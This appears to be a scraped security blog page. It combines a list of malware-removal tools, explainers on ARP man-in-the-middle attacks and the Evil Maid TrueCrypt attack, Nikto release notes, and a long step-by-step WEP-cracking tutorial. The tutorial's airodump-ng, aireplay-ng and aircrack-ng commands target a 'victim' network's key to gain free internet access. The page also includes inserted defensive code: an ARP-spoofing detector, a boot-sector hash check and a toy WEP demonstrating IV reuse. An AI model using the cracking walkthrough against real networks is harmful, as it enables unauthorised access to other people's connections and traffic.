An excellent tool to View and Manage all installed Context-menu/Shell extensions

EzPcFix 1.0.0.16

Helpful tool when trying to remove viruses, spyware, and malware

RemoveWGA 1.2

Windows Genuine Advantage Notifications Removal tool

RRT – Remove Restrictions Tool 3.0

To Re-enable Ctrl+Alt+Del, Folder Options and Registry tools etc.

Antivirus Tools
Kaspersky Virus Removal Tool 7.0.0.290 (2908)

Free on-demand virus scanner from Kaspersky Lab to remove viruses.

Spybot – Search & Destroy 1.6.2 (2908)

Application to scan for spyware, adware, hijackers and other malicious software.

Malwarebytes’ Anti-Malware 1.40 (2908)

anti-malware application that can thoroughly remove even the most advanced malware.

SpywareBlaster 4.2 (2908)

Prevent the installation of spyware and other potentially unwanted software.

SmitFraudFix 2.423

This removes Some of the popular Desktop Hijack malware

ComboFix (2908)

Designed to cleanup malware infections and restore settings modified by malware

CWShredder 2.19

Popular CoolWebSearch Trojan Remover tool

RootkitRevealer 1.7.1

Rootkit Revealer is an advanced patent-pending root kit detection utility.

SuperAntispyware 4.27 (2908)

Remove Malware, Rootkits, Spyware, Adware, Worms, Parasites (a must have tool)

Attack Using Man in the Middle Explained

This is an attack in which the attacker places their system in a strategic position between two communicating systems, e.g. your home PC and Hotmail.

Once in this position, the attacker can launch an array of attacks focused on intercepting the data passing between the two systems.

When a system (the victim) tries to access a network resource, it first sends requests to the other devices on the local network asking for the MAC address associated with the IP address it intends to reach. The requester keeps the IP-to-MAC association in its ARP cache to speed up new connections to the same IP address.

The attack comes when the victim asks the network for the MAC address belonging to an IP address and the attacker answers with forged replies stating that the IP address belongs to its own MAC address. This "short-cuts" the genuine reply from the real host and routes the victim's data traffic through the attacker's system.

Tutorial to follow.
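The forged replies described above leave a distinctive trace on the wire: an IP address whose MAC suddenly changes, replies that nobody asked for, and one MAC answering for several IPs. As an added example (not part of this post), the Python below applies those three arpwatch-style checks to a constructed list of parsed ARP frames; all addresses are made up for the example.

```python
from collections import defaultdict

# Constructed sample of parsed ARP frames: (timestamp, opcode, sender_ip, sender_mac, target_ip).
# opcode 1 = request, 2 = reply. 192.168.2.1 is the gateway, aa:bb:cc:00:00:01 its real MAC;
# de:ad:be:ef:00:99 is the interface sending the forged replies.
SAMPLE_FRAMES = [
    (0.0,  1, "192.168.2.10", "aa:bb:cc:00:00:10", "192.168.2.1"),   # PC asks for the gateway
    (0.1,  2, "192.168.2.1",  "aa:bb:cc:00:00:01", "192.168.2.10"),  # real gateway answers
    (5.0,  2, "192.168.2.1",  "de:ad:be:ef:00:99", "192.168.2.10"),  # forged, unsolicited reply
    (6.0,  2, "192.168.2.1",  "de:ad:be:ef:00:99", "192.168.2.10"),  # repeated to keep the cache poisoned
    (7.0,  2, "192.168.2.10", "de:ad:be:ef:00:99", "192.168.2.1"),   # same MAC now answers for the PC
    (40.0, 1, "192.168.2.10", "aa:bb:cc:00:00:10", "192.168.2.20"),  # normal lookup of another host
    (40.1, 2, "192.168.2.20", "aa:bb:cc:00:00:20", "192.168.2.10"),  # normal answer
]


def detect_arp_spoofing(frames, reply_window=2.0):
    """Return (timestamp, kind, detail) alerts for frames that look like ARP cache poisoning."""
    known = {}                       # ip -> mac last accepted for it
    pending = defaultdict(list)      # ip being asked for -> timestamps of requests
    claims = defaultdict(set)        # mac -> set of ips it has answered for
    alerts = []
    for ts, op, sender_ip, sender_mac, target_ip in sorted(frames):
        sender_mac = sender_mac.lower()
        if op == 1:
            pending[target_ip].append(ts)
            # A request announces the asker's own mapping; record it if unseen.
            known.setdefault(sender_ip, sender_mac)
            continue
        # A reply should follow a request for that IP within reply_window seconds.
        # Gratuitous ARP at boot or DHCP renewal also trips this, so it is a weak signal.
        pending[sender_ip] = [t for t in pending[sender_ip] if ts - t <= reply_window]
        if not pending[sender_ip]:
            alerts.append((ts, "unsolicited-reply", f"{sender_ip} is-at {sender_mac}"))
        # The IP -> MAC mapping should not change; a flip is the core symptom.
        previous = known.get(sender_ip)
        if previous is not None and previous != sender_mac:
            alerts.append((ts, "mapping-changed", f"{sender_ip} was {previous}, now {sender_mac}"))
        known[sender_ip] = sender_mac
        # One interface answering for several IPs is what a full MITM between two hosts looks like.
        claims[sender_mac].add(sender_ip)
        if len(claims[sender_mac]) > 1:
            alerts.append((ts, "mac-claims-multiple-ips",
                           f"{sender_mac} answers for {sorted(claims[sender_mac])}"))
    return alerts


if __name__ == "__main__":
    for ts, kind, detail in detect_arp_spoofing(SAMPLE_FRAMES):
        print(f"t={ts:5.1f}  {kind:24s} {detail}")
```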

Nikto is an Open Source web server scanner which performs comprehensive tests against web servers for multiple items, including over 3500 potentially dangerous files/CGIs, versions on over 900 servers, and version specific problems on over 250 servers. Scan items and plugins are frequently updated and can be automatically updated.

Latest version of Nikto is released 2.1.0 with latest features.

Changes in Nikto 2.1.0:

Rewrite to the plugin engine allowing more control of the plugin structure and making it easier to add plugins.

Rewrite to the reporting engine allowing reporting plugins to cover more and also ensuring that output is written if Nikto is quit before finishing.

Large overhaul of documentation to document built-in methods and variables (available in the tarball or on cirt.net).

Addition of caching to reduce amount of calls made to the web servers, as well as a facility to disable smart 404 guessing.

Addition of simple guessing for whether a system is an embedded device, and reporting of what it is.

Plugin to use OWASP's dictionary lists to attempt to brute force directories on the remote web server (as mutate 6)

Plugin to attempt to brute force domains (as mutate 5)

Allow username guessing (mutate 3 and 4) to use a dictionary file as well as brute forcing

Support for NTLM authentication

Lots of bug fixes and new security checks

Nikto Tutorial

Download Nikto here

Defeat TrueCrypt

Full-disk encryption is often heralded as a panacea to the huge problems of data breaches and laptop thefts, and with good reason. Making the data on a laptop or other device unreadable makes the machine far less attractive or valuable to a thief. However, researchers are showing that this solution has its share of weaknesses, too.


Joanna Rutkowska, a well-known security researcher known mostly for her work on low-level rootkits and virtualization, has published a tool that enables an attacker to boot a protected laptop from a USB drive, capture the encryption tool's passphrase and then decrypt its contents without trouble. The tool is called Evil Maid, and Rutkowska says the attack is simple enough to be pulled off by a hotel housekeeper and is effective against TrueCrypt.

The TrueCrypt Attack

The attack works like this: A laptop user, even one who is paranoid enough to power down his encrypted machine, leaves it alone for a few minutes. An attacker inserts the USB drive containing Evil Maid into the laptop and boots the machine from it. The tool patches a passphrase sniffer into the unencrypted boot loader on the disk, which then logs the encryption passphrase the next time the user enters it. The passphrase is stored on the disk and recovered by the attacker on a second visit.

Rutkowska said the Evil Maid tool is a very simple implementation that could be improved upon.

The provided implementation is extremely simple. It first reads the first 63 sectors of the primary disk (/dev/sda) and checks (looking at the first sector) if the code there looks like a valid TrueCrypt loader. If it does, the rest of the code is unpacked (using gzip) and hooked. Evil Maid hooks the TC's function that asks the user for the passphrase, so that the hook records whatever passphrase is provided to this function. We also take care to adjust some fields in the MBR, like the boot loader size and its checksum. After the hooking is done, the loader is packed again and written back to the disk.

Simple enough, and no mean feat to prevent.
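Hard to prevent, but not hard to detect. The following is an added example, not part of the original article or of the Evil Maid tool: since the attack works by rewriting those first 63 sectors, a per-sector hash of that region taken on a known-clean day and compared from a trusted boot medium before the passphrase is typed will show exactly which sector was touched. The disk image, the sector offset patched and the patch bytes are all constructed for the demo; the checksum Rutkowska mentions is maintained by the loader itself and is fixed up by the hook, so it is no substitute for a hash kept off the machine.

```python
import hashlib

# Added example, not part of the article or of the Evil Maid tool: hash the sectors Evil Maid
# rewrites and compare them with a baseline before typing the passphrase. The disk image, the
# sector offset patched and the patch bytes are all constructed for the demo.

SECTOR = 512
PREBOOT_SECTORS = 63   # sectors 0..62: the MBR plus the gap before the first partition, where the TrueCrypt loader sits


def preboot_hashes(disk_image):
    """SHA-256 of each of the first 63 sectors of the raw disk, in order."""
    return [hashlib.sha256(disk_image[i * SECTOR:(i + 1) * SECTOR]).hexdigest()
            for i in range(PREBOOT_SECTORS)]


def mbr_looks_bootable(disk_image):
    """A real MBR ends in the 0x55AA boot signature; anything else means the wrong device was read."""
    return disk_image[510:512] == b"\x55\xaa"


def changed_sectors(disk_image, baseline):
    """Indices of sectors whose hash no longer matches the baseline recorded on a known-clean day."""
    return [i for i, (now, then) in enumerate(zip(preboot_hashes(disk_image), baseline)) if now != then]


def make_image(seed, sectors=64):
    """Constructed stand-in for the start of /dev/sda: deterministic bytes plus a boot signature."""
    out = bytearray()
    block = seed
    while len(out) < sectors * SECTOR:
        block = hashlib.sha256(block).digest()
        out += block
    out = out[:sectors * SECTOR]
    out[510:512] = b"\x55\xaa"
    return bytes(out)


def hook_loader(disk_image):
    """Stand-in for the evil maid's visit: overwrite a few bytes of loader code in sector 1.
    The offset and the bytes are made up; the point is that only a hash comparison notices."""
    img = bytearray(disk_image)
    img[SECTOR + 0x40:SECTOR + 0x45] = b"\xe8\x00\x00\x00\x90"
    return bytes(img)


def demo():
    clean = make_image(b"my laptop")
    baseline = preboot_hashes(clean)   # keep this off the laptop, e.g. on the USB stick you boot to run the check
    tampered = hook_loader(clean)
    return changed_sectors(clean, baseline), changed_sectors(tampered, baseline), mbr_looks_bootable(tampered)


if __name__ == "__main__":
    # On a real machine, booted from trusted media and running as root:
    # current = open("/dev/sda", "rb").read(SECTOR * PREBOOT_SECTORS)
    print(demo())
```

The check returns an empty list for the clean image and [1] for the hooked one. Two caveats a practitioner should keep in mind: the comparison is only worth anything if it runs from media the attacker could not have touched (the laptop's own OS cannot vouch for its own boot sector), and it detects rather than prevents. The structural fix is a measured boot, where a TPM records the boot code before it runs and refuses to release the disk key if the measurement has changed.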

WEP Encryption – Do You Have Secure Wireless Internet Network Access?

WEP Encryption for Wireless Networks, what a joke.
Any service provider that sends a freshly ironed, uniformed engineer to its clients' homes or workplaces, armed with a toolbox, a degree in obtuse angles, a pre-configured router and a perfunctory 'Welcome to our world' smile, may as well be selling Peckham spring water to our school kids.

My 60-year-old (dearly loved) Mother orders an internet package from a reputable high street vendor so that she may contact her family abroad and, when required, do a little online banking or perhaps shopping. She gets her WEP encrypted wireless router. It's fantastic, works as sold, and the considerate engineer has even refrained from changing the default router admin password (admin, password or 1111 depending on the make) to avoid confusion. Better still (not relevant to this topic, but still a concern, and to be discussed later), the router is left open to remote management. Scan a range of Internet addresses (IPs) allocated to any Internet Service Provider (ISP) with the right tools and you will find a plethora of routers with default passwords open to abuse. This topic will be discussed further at a later date.

So you have your WEP wireless. You could have been advised to use WPA or WPA2 (topics for later discussion). I am not going to invite a debate at this juncture about the opportunities available to a would-be hacker should he/she gain access to your router. For this exercise the objective is simply to crack your WEP key, then gain free access to the internet through your paid connection. Now, this is illegal and should only be practised on your own registered connection. This tutorial is for information purposes only. I hope you read, read and re-read it with an understanding of why you should revisit your home / workplace wireless security configuration, hopefully preventing yourself from becoming compromised and a victim of crime. With your home / office wireless compromised you are open to attacks that could include not just theft of your assets but also your identity.

Hacking Wireless Internet for Dummies

By using the word ‘Dummies’ I am not being condescending to any of my readers here, it’s a term I have chosen to use following the various seminars I have taught, where certain individuals felt their lack of experience with Linux gave them a disadvantage. If you really are a Dummy, relax, it’s easy. No Linux knowledge needed, just follow these instructions.

Linux is friendlier than MS anyway. Linux people are always there to help :)

Boot into Linux

  • We need a PC or notebook with a DVD drive and at least one USB port (should you require an external USB wireless adaptor).
  • We do need a specific wireless adaptor (explained in detail later): one whose chipset supports monitor mode and packet injection, preferably chosen from this list. We at Dirty use the TP-Link TL-WN510G, which does the job perfectly.
  • We are going to use what is generally referred to as a 'Live Distribution DVD'. This is a complete Linux operating system that is built to run entirely from a CD / DVD without even touching your PC's local hard drive (great eh). We will be using the FRHACK version of Backtrack 4 pre-release (Ubuntu, Matrix style), which comes fully loaded with all the latest hacking tools. Download a version of Backtrack 4 using this link: Backtrack4-FRHACK.
  • Once downloaded, burn the ISO to a DVD using your favourite ISO burning software, or download InfraRecorder for free (recommended to us by Google's Matt Cutts, and it actually works).
  • Ensure your PC is configured to boot from CD / DVD. Insert the Backtrack DVD and restart your PC. If all goes well you should hear the DVD spin and the Backtrack Live DVD start to boot up. After a few seconds you will be faced with a command prompt. Type startx [Enter].

Start Cracking Wireless (the fun part)

Scared (for the Dummies) of the command shell (black screen)? Don't be. These instructions will be numbered and concise. There are many ways to skin this cat, but I am going to show you the easy way. I will not explain the reasoning behind every command in this tutorial, just give the instructions you need to be able to hack WEP.

All Hex numbers used for MAC addresses in this example are for demo purposes only. Read the instructions and replace them with your actual results.

Let’s start the black screen.

  1. Microsoft calls them quick launch, call them what you like: bottom left-hand corner of the screen, the button that looks like a black box [Left Click]. If it is not there, navigate the menu to the Konsole shortcut.
  2. Konsole, or command shell, opens with the dreaded black screen.
  3. Attack preparation.

  4. In the Konsole screen type airmon-ng start wlan0 [Enter]
  5. You will then get a response telling you which interface has been put into monitor mode. This is usually mon0. Monitor mode lets the adaptor capture every frame in the air rather than only its own, and with the right chipset lets us inject packets into other people's wireless gear (scary stuff).
  6. Note the monitor mode interface name if it is not mon0.
  7. If wlan0 (that is a zero) can't be found, type ifconfig and check that you actually have a wireless adaptor attached (iwconfig lists only the wireless interfaces).
  8. Hunt for victims

  9. In the Konsole screen now type airodump-ng mon0
  10. This displays, in a split screen, all the routers and PCs within range of your wireless adaptor that are online. The top half lists routers / gateways / access points (we will call them routers; not strictly correct, but we don't want to complicate things here). BSSID is the unique MAC / hardware address of each router. The bottom half lists each Station (PC) MAC address alongside the BSSID it is talking to. How stupid is wireless?
  11. For this exercise we are only interested in BSSIDs and Stations in the bottom half of the screen that are associated, i.e. where a MAC address is shown for both the BSSID and the Station. Pick your target, check that the ENC column for that BSSID says WEP, note its channel (the CH column), and let the hacking begin.
  12. Our victim's data

  13. We need to collect a large number of data packets passing between our chosen router and its Station/PC. Every WEP packet carries a 24-bit IV (initialisation vector) in the clear, and it is these IVs that the cracking tool feeds on. Normally collecting enough would take hours if not days; this is where our special wireless card comes in. While doing the steps above you will have noticed a column header named #Data. That is the count of data packets (and so of IVs) seen so far. You may have watched some routers send 10 or 20 during your brief observation.
  14. We need 10,000 or more. How do we get them? Our golden wireless adaptor can inject packets: it captures an ARP request sent by the Station and replays it back at the router over and over. The router dutifully answers every copy with a freshly encrypted packet, and each answer carries a new IV. The WEP key itself is never transmitted; the weakness is in how WEP mixes the short IV with the key, and once enough IVs have been collected aircrack-ng can work the key out statistically.
  15. Attack our victim

  16. Make a note of your victim's BSSID, its channel and the associated Station (host).
  17. In the Konsole screen press Ctrl+C (the control key plus c).
  18. This stops the previous airodump-ng session. We restart it in the next step, locked to the victim's channel and writing to a file.
  19. Type airodump-ng -c 6 -w wep mon0
    1. airodump-ng = the software we use from the command line to record data packets
    2. mon0 = wireless adaptor (the monitor mode interface)
    3. -c 6 = the channel your victim's wireless uses (6 here; use the one you noted)
    4. -w wep = tells airodump-ng what to name the files it writes the captured data to. You may name and store these files anywhere. They will be needed later. (Adding --bssid 1A:2A:3A:4A:5A:6A limits the capture to your target router alone.)
  20. Again we are only interested in an associated BSSID and Station, as per step 11. At this point we are collecting data very slowly and might crack their WEP in a week or so. How do we inject to speed things up?
  21. Whilst you are collecting data, open another Konsole window. Do not close the first.
  22. Type aireplay-ng -3 -b 1A:2A:3A:4A:5A:6A -h 10:20:30:40:50:60 mon0
  23. The hex numbers after -b and -h are for demonstration purposes only; they stand for the MAC addresses recorded in step 16 and must be replaced with yours.
    1. -3 = the attack mode we are going to use (ARP request replay)
    2. -b = BSSID of the victim router
    3. -h = MAC of the Station (host) associated with the victim
    4. mon0 = wireless adaptor
  24. With aireplay-ng running, the #Data count in the first window should climb faster than Camilla's handshake. It may take a couple of minutes to start, because aireplay-ng first has to see an ARP request from the Station. We can force one (a deauthentication with aireplay-ng -0 makes the Station reconnect and ARP again), but that's another lesson.
  25. Now for the cracking part

  26. Open another Konsole window. Do not close the others. We should have three now.
  27. Type aircrack-ng -b 1A:2A:3A:4A:5A:6A wep-01.cap
    1. aircrack-ng = the software we use from the command line
    2. -b = BSSID of the victim
    3. wep-01.cap = step 19 set the prefix for the capture files; airodump-ng adds -01 and the .cap extension (the number goes up each time you restart it with the same prefix). This is the file we use to calculate the WEP key. Note: this file keeps growing whilst the airodump-ng from step 19 is running.
  28. aircrack-ng will attempt to recover the key from however many IVs have been collected so far in the capture file set in step 19.
  29. Should aircrack-ng fail to recover the key, it automatically retries as long as airodump-ng is running, usually every 5,000 new IVs. We have had some keys that required 50,000 IVs. But they were only government agencies.
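Why do the IVs counted in #Data matter so much? The following is an added example, not code from the tutorial or from the aircrack-ng project: a toy WEP implementation (RC4 keyed with IV || secret key, CRC-32 as the integrity check) that demonstrates two of the design flaws behind the attack above. First, the IV is only 24 bits and is sent in the clear, so on a busy network it repeats; one known plaintext (an ARP request has a predictable header) then decrypts every other packet sent under the same IV with no key at all. Second, CRC-32 is linear, so an attacker can flip chosen bits in a ciphertext and patch the encrypted checksum so the receiver still accepts it. The key, IVs and payloads are constructed for the demo. The statistical key recovery that aircrack-ng actually performs (FMS/KoreK/PTW, exploiting how RC4's key schedule leaks key bytes for certain IVs) is not implemented here; it stems from the same IV-prepended-to-key design.

```python
import struct
import zlib

# Added example, not from the tutorial or the aircrack-ng project: a toy WEP showing why the
# cleartext 24-bit IV and the linear CRC-32 ICV sink the protocol. Everything below is constructed.

SECRET_KEY = bytes.fromhex("0f1e2d3c4b")   # 40-bit ("64-bit") WEP key, made up for the demo
KEY_ID = 0


def rc4_keystream(key, length):
    """RC4: key-scheduling (KSA) then PRGA, returning `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def icv(payload):
    """WEP's integrity check value is a plain CRC-32 (little-endian), which is linear in the data."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(secret, iv, payload):
    """Frame body = IV (3 bytes, in the clear) | key id | RC4(iv || secret) XOR (payload || ICV)."""
    plaintext = payload + icv(payload)
    keystream = rc4_keystream(iv + secret, len(plaintext))
    return iv + bytes([KEY_ID]) + xor(plaintext, keystream)


def wep_decrypt(secret, body):
    iv, ciphertext = body[:3], body[4:]
    plaintext = xor(ciphertext, rc4_keystream(iv + secret, len(ciphertext)))
    payload, tag = plaintext[:-4], plaintext[-4:]
    return payload, tag == icv(payload)


def recover_via_iv_reuse(known_body, known_payload, target_body):
    """Same IV => same keystream. One known plaintext gives the keystream; XOR it into any
    other frame carrying that IV and the payload falls out without the key."""
    if known_body[:3] != target_body[:3]:
        raise ValueError("different IVs, different keystreams")
    if len(target_body) > len(known_body):
        raise ValueError("known frame is shorter than the target; keystream not long enough")
    keystream = xor(known_body[4:], known_payload + icv(known_payload))
    return xor(target_body[4:], keystream)[:-4]


def forge_bits(body, delta):
    """crc(a ^ d) == crc(a) ^ crc(d) ^ crc(zeros), so XORing `delta` into the ciphertext and the
    matching correction into the encrypted ICV yields a frame the receiver accepts, key unknown."""
    zeros = bytes(len(delta))
    mask = delta + xor(icv(delta), icv(zeros))
    return body[:4] + xor(body[4:], mask)


def demo():
    iv = b"\x01\x02\x03"                       # a 24-bit IV; only 2**24 exist, so reuse is inevitable
    snap_arp = bytes.fromhex("aaaa030000000806")
    snap_ip = bytes.fromhex("aaaa030000000800")
    known_payload = snap_arp + bytes.fromhex("0001080006040001") + bytes(20)   # ARP request: predictable bytes
    secret_payload = snap_ip + b"GET /login?user=mum&pin=1234"                 # constructed, same length
    known_body = wep_encrypt(SECRET_KEY, iv, known_payload)
    secret_body = wep_encrypt(SECRET_KEY, iv, secret_payload)
    recovered = recover_via_iv_reuse(known_body, known_payload, secret_body)
    delta = bytearray(len(secret_payload))
    delta[-4:] = xor(b"1234", b"9999")       # flip the bits that turn the PIN 1234 into 9999
    forged_payload, accepted = wep_decrypt(SECRET_KEY, forge_bits(secret_body, bytes(delta)))
    return recovered, forged_payload, accepted


if __name__ == "__main__":
    print(demo())
```

Running demo() returns the second packet's plaintext recovered from the first, and a forged packet that the receiver accepts with the PIN changed, neither of which needed the key. The replay in step 22 is the practical face of the first flaw: every replayed ARP request makes the router burn another IV for the cracker's benefit.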

Nuts and bolts:

  • Download, burn and run Backtrack 4 or a similar distro with the aircrack-ng suite of tools
  • startx [Enter] if you need the GUI
  • Open a Konsole or command shell window
  • airmon-ng start wlan0 (your card may not be wlan0; please check with ifconfig)
  • airodump-ng mon0 to find a victim
  • airodump-ng -c 6 -w wep mon0 (6 being your victim's channel (it could be anything, look and see) and wep being your file name prefix)
  • Open another Konsole or command shell window
  • aireplay-ng -3 -b 1A:2A:3A:4A:5A:6A -h 10:20:30:40:50:60 mon0 (-3 is our method of attack, -b the BSSID, -h the host or Station; the hex numbers following -b and -h should be replaced with your own victim's router and host MAC addresses; mon0 is the wireless adaptor)
  • Once we have started collecting some IVs or data packets we need to start cracking
  • aircrack-ng -b 1A:2A:3A:4A:5A:6A wep-01.cap (-b for BSSID (again replace the hex with your own victim's MAC address) and wep-01.cap is the capture file whose prefix you set in step 19)
  • aircrack-ng will keep trying to crack the WEP key whilst you collect packets using airodump-ng and aireplay-ng.
  • airodump-ng --help
  • aireplay-ng --help
  • aircrack-ng --help

If you are brave, go to the aircrack-ng website (we cannot link to them for legal reasons - dubdubdub.aircrack-ng.org) and check out wesside-ng, which automates the whole WEP process. We will be doing a tutorial on wesside-ng in 4 weeks.
Next up will be how to crack WPA TKIP in 2 minutes without using brute force or a wizard's wordlist.